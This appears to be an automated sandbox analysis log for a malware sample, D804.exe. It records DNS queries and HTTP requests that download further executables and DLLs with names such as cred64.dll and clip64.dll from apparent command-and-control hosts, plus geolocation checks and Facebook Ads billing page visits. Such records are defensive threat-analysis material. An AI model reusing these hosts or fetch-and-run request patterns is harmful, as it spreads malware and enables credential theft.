                Source: D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.636070288.00000000031DB000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-tnzomMj6HU
                Source: unknownDNS traffic detected: queries for: potunulit.org
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: speedlab.com.eg
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: speedlab.com.eg
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: speedlab.com.eg
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: speedlab.com.eg
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: adsmanager.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentHost: www.facebook.com
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: adsmanager.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentHost: www.facebook.com
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shsplatform.co.uk
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: adsmanager.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentHost: www.facebook.com
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: adsmanager.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62sec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentHost: www.facebook.com
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=638c97e8fa9f45a999_4963120488110758311
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /power.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /sts/image.jpg HTTP/1.1User-Agent: HTTPREADHost: jp.imgjeoighw.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /power.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /0bjdn2Z/Plugins/cred64.dll HTTP/1.1Host: 45.9.74.80
                Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /0bjdn2Z/Plugins/clip64.dll HTTP/1.1Host: 45.9.74.80
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /power.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /power.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /cc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.180.48.90
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62Host: ss.apjeoighw.com
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /e44c96dfdf315ccf17cdd4b93cfe6e48 HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
